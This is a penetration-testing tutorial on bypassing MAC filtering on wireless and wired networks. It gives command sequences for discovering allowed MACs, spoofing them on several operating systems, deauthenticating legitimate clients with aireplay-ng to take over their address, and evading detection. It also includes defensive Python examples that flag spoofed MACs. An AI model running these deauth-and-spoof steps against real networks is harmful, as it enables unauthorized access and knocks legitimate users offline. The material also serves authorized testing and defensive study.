# MAC Filtering Bypass
## Overview
MAC filtering is a network access control mechanism that allows or denies network access based on the device's MAC (Media Access Control) address. It's commonly used on wireless APs (allowlist/denylist), wired switches (port security), and NAC systems. MAC filtering is widely considered a weak security control because MAC addresses are transmitted in cleartext and can be easily observed and spoofed.
This guide covers techniques to discover, bypass, and exploit MAC filtering on both wireless and wired networks.
## How MAC Filtering Works
| Implementation | Mechanism | Weakness |
|---|---|---|
| Wireless AP allowlist | Only listed MACs can associate | MAC visible in probe/association frames |
| Wireless AP denylist | Listed MACs are blocked | Trivially bypassed by changing MAC |
| Switch port security | Limits MACs per port | Attacker spoofs a MAC already learned on the port |
| NAC MAC Authentication Bypass (MAB) | MAC as fallback auth | Spoof an allowed device type |
| RADIUS MAC auth | MAC checked against RADIUS | Same as allowlist but centralized |
## Method 1: Passive MAC Discovery
The first step is always passive monitoring — observe which MAC addresses are authenticated and allowed on the network.
### Wireless MAC Discovery
```bash
# Monitor all 802.11 frames on the target channel to discover authenticated MACs
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write mac-survey

# Extract unique client MACs that sent association requests (client is the source)
tshark -r mac-survey-01.cap -Y 'wlan.fc.type_subtype == 0x0000' \
  -T fields -e wlan.sa | sort -u

# Extract clients whose association succeeded: status code 0 in the AP's
# association response (the client is the destination of that frame)
tshark -r mac-survey-01.cap -Y 'wlan.fc.type_subtype == 0x0001 && wlan.fixed.status_code == 0' \
  -T fields -e wlan.da | sort -u

# Show both source and destination MACs
tshark -r mac-survey-01.cap \
  -T fields -e wlan.sa -e wlan.da | tr '\t' '\n' | sort -u
```
### Wired MAC Discovery
```bash
# Active ARP sweep of the local subnet shows MAC-IP mappings
arp-scan --interface=eth0 --localnet

# DHCP server lease file (if you have access to the DHCP server;
# dhclient.leases only holds this host's own lease)
cat /var/lib/dhcp/dhcpd.leases

# Switch MAC address table (if you have switch access)
# Cisco:   show mac address-table
# Juniper: show ethernet-switching table

# Passive ARP monitoring (-e prints link-layer addresses)
tcpdump -i eth0 -nn -e arp
```
## Method 2: MAC Spoofing
Once you've identified an allowed MAC address, spoof it on your adapter.
### Linux MAC Spoofing
```bash
# Method 1: ip command (preferred); the interface must be down to change the address
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <TARGET_MAC>
sudo ip link set dev wlan0 up

# Method 2: ifconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether <TARGET_MAC>
sudo ifconfig wlan0 up

# Method 3: macchanger (random or specific)
sudo ifconfig wlan0 down
sudo macchanger -m <TARGET_MAC> wlan0   # Specific MAC
sudo macchanger -r wlan0                # Fully random MAC
sudo macchanger -e wlan0                # Keep the vendor OUI, randomize the device-specific bytes
sudo ifconfig wlan0 up

# Method 4: for wireless adapters
sudo iw dev wlan0 set addr <TARGET_MAC>

# Verify MAC change
ip link show wlan0 | grep ether
# or
macchanger -s wlan0
```
### Windows MAC Spoofing
```powershell
# Method 1: Registry (requires reboot)
# Navigate to HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-...}
# Find the network adapter's subkey and set the "NetworkAddress" value to the target MAC

# Method 2: Device Manager
# Network Adapters -> Properties -> Advanced -> Network Address -> Value: <TARGET_MAC>

# Method 3: PowerShell (NetAdapter module)
Set-NetAdapter -Name "Ethernet" -MacAddress "<TARGET_MAC>"
```
### macOS MAC Spoofing
```bash
# Change MAC on macOS
sudo ifconfig en0 ether <TARGET_MAC>
sudo ifconfig en0 down
sudo ifconfig en0 up

# Verify
ifconfig en0 | grep ether
```
## Method 3: OUI Fingerprinting for Realistic MACs
When spoofing a MAC, using a realistic OUI (Organizationally Unique Identifier — the first 3 bytes) prevents detection by MAC filtering that checks device type.
```bash
# Install OUI database
apt install ieee-data
# Or download: https://standards.ieee.org/products-programs/regauth/oui/

# Look up a vendor's OUI prefix
grep -i "apple" /usr/share/ieee-data/oui.txt
# Result: 00:03:93, 00:05:02, etc.

# Common enterprise device OUIs:
# Dell:    00:01:C8, 00:06:5B, 00:08:74, 00:0B:DB, 00:0D:56
# HP:      00:01:E6, 00:02:A5, 00:04:EA, 00:06:5B, 00:07:85
# Lenovo:  00:1A:A0, 00:1D:72, 00:1E:EC, 00:21:CC, 00:23:18
# Cisco:   00:00:0C, 00:03:E3, 00:05:5E, 00:06:28, 00:08:02
# Aruba:   00:0B:86, 00:0E:38, 00:11:92, 00:14:5E, 00:17:CB
# Polycom: 00:04:F2, 00:07:53, 00:0E:7E, 00:13:C6, 00:16:35

# Generate a realistic MAC for a specific vendor
# Format: OUI:XX:XX:XX where XX is random hex
python3 -c "import random; oui='00:06:5B'; print(f'{oui}:{random.randint(0,255):02X}:{random.randint(0,255):02X}:{random.randint(0,255):02X}')"
```
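As an added example (not code from the original page), the Python below does the other half of OUI work: it parses registry lines in the IEEE oui.txt layout, normalizes MACs written in the common notations (colon, dash, Cisco dotted, bare hex), and reports the vendor and the universal/local (U/L) bit, which is the check a NAC or log analyst applies to spot randomized or hand-set addresses. The registry excerpt and the vendor strings are constructed; the OUIs are taken from the list above.

```python
"""OUI lookup and MAC classification (added example; not from the original page).

The registry excerpt below is constructed in the layout of the IEEE oui.txt file:
OUIs come from the page's vendor list, organisation strings are illustrative.
"""
import re

SAMPLE_OUI_TXT = """\
00-06-5B   (hex)\t\tDell Inc.
00-1A-4B   (hex)\t\tHewlett Packard
00-00-0C   (hex)\t\tCisco Systems, Inc
00-0B-86   (hex)\t\tAruba Networks
"""

# One registry line: "XX-XX-XX   (hex)   Organisation"
OUI_LINE = re.compile(r"^([0-9A-F]{2})-([0-9A-F]{2})-([0-9A-F]{2})\s+\(hex\)\s+(.+?)\s*$")


def normalize_mac(mac: str) -> str:
    """Accept 00:06:5b:aa:bb:cc, 00-06-5B-AA-BB-CC, 0006.5baa.bbcc or 00065baabbcc
    and return the canonical upper-case colon form; raise ValueError otherwise."""
    digits = re.sub(r"[:\-.]", "", mac.strip())
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    digits = digits.upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def load_oui_db(text: str) -> dict:
    """Map 'XX:XX:XX' -> organisation from oui.txt-style lines; other lines are ignored."""
    db = {}
    for line in text.splitlines():
        m = OUI_LINE.match(line)
        if m:
            db[":".join(m.group(1, 2, 3))] = m.group(4)
    return db


def oui_of(mac: str) -> str:
    return normalize_mac(mac)[:8]


def vendor_of(mac: str, db: dict):
    """Registered organisation for the MAC's OUI, or None if unregistered."""
    return db.get(oui_of(mac))


def is_locally_administered(mac: str) -> bool:
    """Bit 0x02 of the first octet: set on randomized/hand-assigned addresses,
    never on an IEEE-assigned OUI."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def is_multicast(mac: str) -> bool:
    """Bit 0x01 of the first octet: group address, never a valid station MAC."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x01)


def classify(mac: str, db: dict) -> dict:
    """Everything an analyst wants to know about one observed MAC."""
    n = normalize_mac(mac)
    return {
        "mac": n,
        "oui": n[:8],
        "vendor": db.get(n[:8]),
        "locally_administered": is_locally_administered(n),
        "multicast": is_multicast(n),
    }


if __name__ == "__main__":
    db = load_oui_db(SAMPLE_OUI_TXT)
    for sample in ("00:06:5b:12:34:56", "02-06-5B-12-34-56", "001a.4b10.2030"):
        print(classify(sample, db))
```

A MAC whose first octet has the 0x02 bit set cannot carry a registered OUI, so a "Dell" prefix with that bit set (02:06:5B:...) is an immediate tell; MAC randomization in operating systems and tools sets that bit by default, which is why the "MAC OUI mismatch" row in the detection table below is cheap for defenders to check.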
## Method 4: Enterprise AP MAC Filtering Bypass
Enterprise wireless APs (Cisco, Aruba, Ruckus) may implement MAC filtering differently than consumer routers.
### Cisco AP MAC Filtering
```bash
# Cisco APs typically use RADIUS MAC authentication:
# the AP sends the client MAC to a RADIUS server for approval.
# Bypass: spoof a MAC that's in the RADIUS allowlist

# 1. Monitor for associated clients
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC>
# 2. Identify allowed MACs (associated clients)
# 3. Choose a MAC with the same device type (OUI) as your adapter
# 4. Disconnect the original client (deauth)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <ORIGINAL_CLIENT_MAC> wlan0mon
# 5. Spoof the MAC and connect
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <ORIGINAL_CLIENT_MAC>
sudo ip link set dev wlan0 up
# Connect to the AP with the spoofed MAC
```
### Aruba AP MAC Filtering
```bash
# Aruba APs may use a local MAC database or ClearPass for MAC auth.
# ClearPass can be bypassed if the MAC matches a known device type.
# Bypass: spoof a printer, IoT device, or VoIP phone MAC;
# these device types often have more permissive policies in ClearPass.
# Use an OUI from HP (printer), Cisco (VoIP), or a common IoT vendor.

# Generate a realistic printer MAC
# HP printer OUI: 00:1A:4B
python3 -c "import random; print(f'00:1A:4B:{random.randint(0,255):02X}:{random.randint(0,255):02X}:{random.randint(0,255):02X}')"
```
## Method 5: Wireless MAC Filtering Detection and Bypass
### Detecting MAC Filtering
```bash
# Method 1: Association status
# Try to associate with a random MAC
sudo aireplay-ng -1 0 -a <AP_MAC> -h <RANDOM_MAC> wlan0mon
# If association fails, MAC filtering may be active

# Method 2: Check AP configuration (if you have admin access)
# Look for "MAC Filter", "Allowed MACs", "Station Filter"

# Method 3: Association response status codes
# Code 1  = Unspecified failure (may indicate MAC filtering)
# Code 10 = Association denied (may indicate MAC filtering)
# Code 12 = Association denied due to policy
```
### Bypassing Wireless MAC Filtering
```bash
# Step 1: Discover allowed MACs
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC>

# Step 2: Deauth the client whose MAC you want to spoof
sudo aireplay-ng -0 1 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Step 3: Quickly spoof the MAC and connect
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <CLIENT_MAC>
sudo ip link set dev wlan0 up
# Connect to the AP immediately
```
## Detection: How Defenders Detect MAC Spoofing
| Detection Method | Indicator |
|---|---|
| Duplicate MAC detection | Same MAC from different ports/locations |
| MAC OUI mismatch | MAC claims to be one vendor but traffic matches another |
| Behavioral analysis | Traffic patterns don't match the spoofed device type |
| DHCP fingerprinting | DHCP request doesn't match the claimed device OS |
| 802.1X authentication | MAC doesn't match the authenticated identity |
| Port security violation | MAC limit exceeded on a switch port |
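To show how several of these indicators combine in practice, here is an added Python example (not code from the original page or from any vendor's NAC product) that runs four rules over a constructed observation log: duplicate MAC across locations, OUI versus DHCP vendor-class mismatch, the locally administered bit, and a port-security style per-port MAC limit. The events, the OUI table and the expected-DHCP-class policy are constructed for illustration (OUIs from the page's list); "MSFT 5.0" is the vendor class identifier Windows DHCP clients send, and the JetDirect string is an assumed value for an HP printer.

```python
"""Correlating MAC-spoofing indicators over network observations.

Added example, not from the original page. EVENTS, OUI_VENDOR and
EXPECTED_DHCP_CLASS are constructed; the rules implement the duplicate-MAC,
OUI/DHCP-fingerprint, locally-administered-bit and port-security rows of the
detection table above.
"""
from collections import defaultdict

# Constructed vendor table (OUIs from the page's list).
OUI_VENDOR = {"00:06:5B": "Dell", "00:1A:4B": "HP", "00:00:0C": "Cisco"}

# Hypothetical policy: what a device with this OUI should announce in DHCP
# option 60. The JetDirect string is an assumed value for an HP printer.
EXPECTED_DHCP_CLASS = {"00:1A:4B": "Hewlett-Packard JetDirect"}

# Constructed observation log: (time_s, mac, location, dhcp_vendor_class or None)
EVENTS = [
    (100, "00:1A:4B:10:20:30", "sw1/Gi1/0/7",  "Hewlett-Packard JetDirect"),
    (160, "00:06:5B:AA:BB:CC", "sw1/Gi1/0/12", "MSFT 5.0"),
    (200, "00:1A:4B:10:20:30", "ap3/wlan0",    "MSFT 5.0"),  # printer MAC reappears on Wi-Fi as a Windows host
    (260, "02:06:5B:AA:BB:CC", "sw1/Gi1/0/12", None),        # second MAC on the port, U/L bit set
    (300, "00:06:5B:AA:BB:CC", "sw1/Gi1/0/12", "MSFT 5.0"),  # ordinary repeat, no alert
]


def oui_of(mac: str) -> str:
    return mac.upper()[:8]


def is_locally_administered(mac: str) -> bool:
    """0x02 bit of the first octet: set by MAC randomization, never by an IEEE OUI."""
    return bool(int(mac[:2], 16) & 0x02)


def detect(events, window_s=300, max_macs_per_port=1):
    """Return (rule, subject, detail) alerts in the order the rules fire."""
    alerts = []
    last_seen = {}                 # mac -> (time, location)
    port_macs = defaultdict(set)   # switch port -> distinct MACs learned on it
    for ts, mac, location, dhcp_class in events:
        mac = mac.upper()

        # Rule 1: the same MAC at two locations inside the time window.
        prev = last_seen.get(mac)
        if prev and prev[1] != location and ts - prev[0] <= window_s:
            alerts.append(("duplicate_mac", mac, f"{prev[1]} -> {location}"))
        last_seen[mac] = (ts, location)

        # Rule 2: the OUI claims one device class, the DHCP vendor class another.
        expected = EXPECTED_DHCP_CLASS.get(oui_of(mac))
        if expected and dhcp_class and dhcp_class != expected:
            vendor = OUI_VENDOR.get(oui_of(mac), "unknown")
            alerts.append(("dhcp_oui_mismatch", mac,
                           f"{vendor} OUI but DHCP class {dhcp_class!r}"))

        # Rule 3: locally administered bit, typical of randomized or hand-set MACs.
        if is_locally_administered(mac):
            alerts.append(("locally_administered", mac, location))

        # Rule 4: port-security style limit on distinct MACs per wired port
        # (locations starting with "sw" are switch ports in this constructed log).
        if location.startswith("sw") and mac not in port_macs[location]:
            port_macs[location].add(mac)
            if len(port_macs[location]) > max_macs_per_port:
                alerts.append(("port_mac_limit", location, sorted(port_macs[location])))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

Each rule on its own is noisy (a laptop roaming from dock to Wi-Fi also trips the duplicate-MAC rule), which is why the table lists several indicators: the printer MAC in the log above fires both the location and the DHCP-class rule within seconds, and that combination is what an analyst would escalate.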
## Common Pitfalls
- IP conflict: If the original device is still connected with the same IP, you'll create an IP conflict. Wait for the device to disconnect or use a different IP.
- MAC aging: Switch MAC tables age out entries. If the original device disconnects, the switch may clear its MAC before you reconnect.
- Port security: Switches with port security may lock the port after seeing a different MAC. Test by checking if the port is still active after spoofing.
- 802.1X: If 802.1X is active, MAC spoofing alone won't provide access. You need both the correct MAC and 802.1X credentials.
- Wireless adapter limitations: Some wireless adapters don't support MAC spoofing in monitor/managed mode. Test with `iw dev wlan0 set addr <MAC>`.
## OPSEC Considerations
- MAC spoofing creates duplicate MAC events that are logged by enterprise switches
- If the original device reconnects while you're using its MAC, both devices will experience connectivity issues
- OUI mismatches (e.g., claiming to be a Dell laptop but using an Alfa WiFi adapter) are detectable by NAC systems
- DHCP fingerprinting reveals the true OS regardless of MAC address
- Use MAC addresses from the same vendor/device type as your adapter to reduce detection
## Cross-References
- NAC Bypass — MAC filtering is often part of NAC
- 802.1X Attacks — 802.1X with MAC spoofing
- Captive Portal Bypass — Captive portals often use MAC filtering
- VLAN Hopping — Combine MAC spoofing with VLAN hopping
- 09 - Lateral Movement — Post-access lateral movement
## Tool References
| Tool | Purpose | Link |
|---|---|---|
| macchanger | MAC address spoofing | https://github.com/alxchk/macchanger |
| airodump-ng | Wireless MAC discovery | https://www.aircrack-ng.org/ |
| arp-scan | Wired MAC discovery | https://github.com/royhills/arp-scan |
| tshark | Packet analysis | https://www.wireshark.org/ |
| scapy | Packet crafting and spoofing | https://scapy.net/ |